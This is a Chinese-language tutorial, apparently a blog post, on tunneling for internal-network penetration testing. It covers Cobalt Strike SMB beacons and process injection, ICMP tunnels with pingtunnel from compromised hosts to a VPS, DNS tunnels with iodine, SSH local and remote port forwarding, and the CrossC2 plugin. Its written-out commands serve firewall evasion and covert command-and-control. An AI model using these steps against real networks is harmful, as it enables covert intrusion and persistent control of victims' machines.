【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议

本文涉及的产品
公共DNS(含HTTPDNS解析),每月1000万次HTTP解析
全局流量管理 GTM,标准版 1个月
云解析 DNS,旗舰版 1个月
简介: 【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议

一、基础知识


【内网安全-基础】基础知识、信息收集、工具

https://blog.csdn.net/qq_53079406/article/details/128292587?spm=1001.2014.3001.5501

【内网安全-防火墙】防火墙、协议、策略

https://blog.csdn.net/qq_53079406/article/details/128314938?spm=1001.2014.3001.5501

【内网安全-通讯&上线】通讯&上线基础知识

https://blog.csdn.net/qq_53079406/article/details/128320574?spm=1001.2014.3001.5501


二、隧道技术


1、简介:


1)是路由器把一种网络层协议封装到另一个协议中以跨过网络传送到另一个路由器的处理过程

————


2)隧道技术是一种数据包封装技术,它是将原始IP包(其报头包含原始发送者和最终目的地)封装在另一个数据包(称为封装的IP包)的数据净荷中进行传输

————


3)隧道技术上线:

HTTP/S & DNS & SSH & ICMP & SMB & 协议穿透等

除去SMB隧道外,其他隧道技术大部分针对的出站策略绕过(也就是最终传输的地方会转会原本的协议)


2、SMB隧道


1)SMB(全称是Server Message Block)是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通


#判断:445端口


————


2)上线条件


1、目标主机(SMB Beacon)接受 445 端口连接(因此445端口成为判断能否使用的方法)

2、Beacon只能链接由同一个 CS生成的

3、具有管理员权限或管理员凭据

————


3)使用(工具cs)

1、创建SMB Beacon 监听器、生成木马

(用Windows可执行程序E,这里我试了试没用过的选项,stageless意为没有舞台)

d87c084da58a4489b973c1a650bf7940.png


f423035ae03e493286fd085ad43e2cbd.png

1fa9993083a44044951005c840894452.png


2、派生会话SMB Beacon(右键选中HTTP监听器上线的主机,进入Beacon控制台,输入spawn加SMB Beacon的监听器名称)


(预计process为rundll32.exe的主机会派生会话)

0df386fa33bd48a5aab18dd135f20ad5.png


(结果:新产生一个process为beacon.exe的派生会话)



3、注入进程上线SMB Beacon(将SMB Beacon注入到某个进程中;右键--目标--进程列表--Inject--选中Beacon)


(预计最后SMB Beacon,process会变为phpstudy的进程 )

5e47a404ad6f4cd0a179d09285ff8587.png


开了phpstudy做测试

9764eebb90d649f88ea5338da218faa5.png


(结果新产生了一个process为beacon.exe的)

0c97c7f8a549487ba476925769d233d1.png


3、ICMP隧道


1)ICMP隧道技术是一种数据包封装技术,它是将原始IP包封装在ICMP的数据净荷中进行传输(传到接收方的时候,再变回Tcp)


#判断:ping命令(ping命令waf、防火墙不屏蔽情况下可以穿透)

————


2)在ICMP通信协议中,通信双方不需要开放端口( ping 命令)

———


3)ICMP协议项目:

https://github.com/esrrhs/spp

https://github.com/bdamele/icmpsh

https://github.com/esrrhs/pingtunnel

———

4)使用:

VPS:

./pingtunnel -type server


148ff74acda44fcda225364675060c54.png


(出现问题: ./ping 隧道: 拒绝许可)

肉鸡:

管理器运行(ICMP程序)

pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.46.66 -t 192.168.46.66:7777 -tcp 1 -noprint 1 -nolog 1(此处,监听本地6666端口,并转发到指定ip的7777端口)

——

CS:

监听器1:127.0.0.1 6666

监听器2:192.168.46.66 7777

生成监听器1的Stager后门肉鸡执行


4、DNS隧道


1)DNS:为了访问互联网和内网资源,DNS提供域名解析服务,将域名和IP地址进行转换

————


2)DNS隧道是将其他协议的内容封装在DNS协议中,然后以DNS请求和响应包完成传输数据(通信)的技术。当前网络世界中的DNS是一项必不可少的服务,所以防火墙和入侵检测设备将很难做到完全过滤掉DNS流量

#判断:nslookup dig

————


#工具:https://github.com/yarrick/iodine


iodine原理:通过TAP虚拟网卡,在服务端建立起一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网。在客户端和服务端之间建立连接后,客户机上会多出一块名为dns0的虚拟网卡

————


3)上线条件:


1、内网主机出网DNS协议数据

2、域名申请及配置

3、监听器创建及配置

4、后门绑定监听器及生成

———


4)上线:

1、内网主机出网DNS协议数据(解决通讯)

工具:https://github.com/yarrick/iodine

判断出网:nslookup www.baidu.com

——


2、服务器:设置密码并创建虚拟IP及绑定域名指向

iodined -f -c -P 密码 192.168.0.1 ns1.域名 -DD

设置密码并创建虚拟IP及绑定域名指向

——


3、客户端:连接密码并绑定域名指向

iodine -f -M 200 -P 密码 ns1.域名

-尝试通讯尝试连接:

ssh root@192.168.0.2


5、SSH协议


1)安全外壳协议(Secure Shell,简称SSH)是一种在不安全网络上用于安全远程登录和其他安全网络服务的协议

————

2)CS无SSH协议监听器配置,无法上线

————

3)通讯(SSH协议存在于Linux系统,跳板机必须Linux):


iptables -F /* 清除所有规则 */
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /*保存配置*/
iptables -L /* 显示iptables列表 */
开启ssh协议登录:
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart
本地:出站封
ssh -CfNg -L 1122:192.168.1.15:8080 root@192.168.1.166
curl http://127.0.0.1:1122
远程:入站封
ssh -CfNg -R 1234:192.168.1.15:8080 root@IP地址
curl http://127.0.0.1:1234

6、控制上线-插件

https://github.com/gloxec/CrossC2


面向Linux Mac IOS Android系统上线支持


————


目前版本只支持反向的https和正向的tcp

1、下载对应版本加载器和CNA插件

2、上传加载器文件和本地加载CNA插件

3、修改CNA插件配置路径及上传Key文件

4、使用命令或插件绑定HTTPS监听器生成


7d62be979184459ab44139ed85f387fe.png

目录
相关文章
|
25天前
|
机器学习/深度学习 人工智能 自然语言处理
AI技术深度解析:从基础到应用的全面介绍
人工智能(AI)技术的迅猛发展,正在深刻改变着我们的生活和工作方式。从自然语言处理(NLP)到机器学习,从神经网络到大型语言模型(LLM),AI技术的每一次进步都带来了前所未有的机遇和挑战。本文将从背景、历史、业务场景、Python代码示例、流程图以及如何上手等多个方面,对AI技术中的关键组件进行深度解析,为读者呈现一个全面而深入的AI技术世界。
107 10
|
9天前
|
自然语言处理 文字识别 数据处理
多模态文件信息抽取:技术解析与实践评测!
在大数据和人工智能时代,企业和开发者面临的挑战是如何高效处理多模态数据(文本、图像、音频、视频)以快速提取有价值信息。传统方法效率低下,难以满足现代需求。本文将深度评测阿里云的多模态文件信息抽取解决方案,涵盖部署、应用、功能与性能,揭示其在复杂数据处理中的潜力。通过自然语言处理(NLP)、计算机视觉(CV)、语音识别(ASR)等技术,该方案助力企业挖掘多模态数据的价值,提升数据利用效率。
25 4
多模态文件信息抽取:技术解析与实践评测!
|
2天前
|
Kubernetes Linux 虚拟化
入门级容器技术解析:Docker和K8s的区别与关系
本文介绍了容器技术的发展历程及其重要组成部分Docker和Kubernetes。从传统物理机到虚拟机,再到容器化,每一步都旨在更高效地利用服务器资源并简化应用部署。容器技术通过隔离环境、减少依赖冲突和提高可移植性,解决了传统部署方式中的诸多问题。Docker作为容器化平台,专注于创建和管理容器;而Kubernetes则是一个强大的容器编排系统,用于自动化部署、扩展和管理容器化应用。两者相辅相成,共同推动了现代云原生应用的快速发展。
31 10
|
11天前
|
域名解析 负载均衡 安全
DNS技术标准趋势和安全研究
本文探讨了互联网域名基础设施的结构性安全风险,由清华大学段教授团队多年研究总结。文章指出,DNS系统的安全性不仅受代码实现影响,更源于其设计、实现、运营及治理中的固有缺陷。主要风险包括协议设计缺陷(如明文传输)、生态演进隐患(如单点故障增加)和薄弱的信任关系(如威胁情报被操纵)。团队通过多项研究揭示了这些深层次问题,并呼吁构建更加可信的DNS基础设施,以保障全球互联网的安全稳定运行。
|
11天前
|
缓存 网络协议 安全
融合DNS技术产品和生态
本文介绍了阿里云在互联网基础资源领域的最新进展和解决方案,重点围绕共筑韧性寻址、赋能新质生产展开。随着应用规模的增长,基础服务的韧性变得尤为重要。阿里云作为互联网资源的践行者,致力于推动互联网基础资源技术研究和自主创新,打造更韧性的寻址基础服务。文章还详细介绍了浙江省IPv6创新实验室的成立背景与工作进展,以及阿里云在IPv6规模化部署、DNS产品能力升级等方面的成果。此外,阿里云通过端云融合场景下的企业级DNS服务,帮助企业构建稳定安全的DNS系统,确保企业在数字世界中的稳定运行。最后,文章强调了全链路极致高可用的企业DNS解决方案,为全球互联网基础资源的创新提供了中国标准和数字化解决方案。
|
12天前
|
缓存 边缘计算 网络协议
深入解析CDN技术:加速互联网内容分发的幕后英雄
内容分发网络(CDN)是现代互联网架构的重要组成部分,通过全球分布的服务器节点,加速网站、应用和多媒体内容的传递。它不仅提升了访问速度和用户体验,还减轻了源站服务器的负担。CDN的核心技术包括缓存机制、动态加速、流媒体加速和安全防护,广泛应用于静态资源、动态内容、视频直播及大文件下载等场景,具有低延迟、高带宽、稳定性强等优势,有效降低成本并保障安全。
53 4
|
19天前
|
网络协议 安全 网络安全
探索网络模型与协议:从OSI到HTTPs的原理解析
OSI七层网络模型和TCP/IP四层模型是理解和设计计算机网络的框架。OSI模型包括物理层、数据链路层、网络层、传输层、会话层、表示层和应用层,而TCP/IP模型则简化为链路层、网络层、传输层和 HTTPS协议基于HTTP并通过TLS/SSL加密数据,确保安全传输。其连接过程涉及TCP三次握手、SSL证书验证、对称密钥交换等步骤,以保障通信的安全性和完整性。数字信封技术使用非对称加密和数字证书确保数据的机密性和身份认证。 浏览器通过Https访问网站的过程包括输入网址、DNS解析、建立TCP连接、发送HTTPS请求、接收响应、验证证书和解析网页内容等步骤,确保用户与服务器之间的安全通信。
74 1
|
1月前
|
机器学习/深度学习 人工智能 自然语言处理
秒级响应 + 99.9%准确率:法律行业文本比对技术解析
本工具基于先进AI技术,采用自然语言处理和语义匹配算法,支持PDF、Word等格式,实现法律文本的智能化比对。具备高精度语义匹配、多格式兼容、高性能架构及智能化标注与可视化等特点,有效解决文本复杂性和法规更新难题,提升法律行业工作效率。
|
29天前
|
数据采集 存储 JavaScript
网页爬虫技术全解析:从基础到实战
在信息爆炸的时代,网页爬虫作为数据采集的重要工具,已成为数据科学家、研究人员和开发者不可或缺的技术。本文全面解析网页爬虫的基础概念、工作原理、技术栈与工具,以及实战案例,探讨其合法性与道德问题,分享爬虫设计与实现的详细步骤,介绍优化与维护的方法,应对反爬虫机制、动态内容加载等挑战,旨在帮助读者深入理解并合理运用网页爬虫技术。
|
24天前
|
传感器
Modbus协议深入解析
Modbus协议是由Modicon公司(现施耐德电气)于1979年发明的串行通信协议,主要用于工业自动化系统中的PLC通信。本文深入解析了Modbus协议的主从模式、数据类型(线圈、离散输入、保持寄存器、输入寄存器)、帧结构和通信过程,并介绍了其应用场景和重要性。
22 0

热门文章

最新文章

相关产品

  • 云解析DNS
  • 推荐镜像

    更多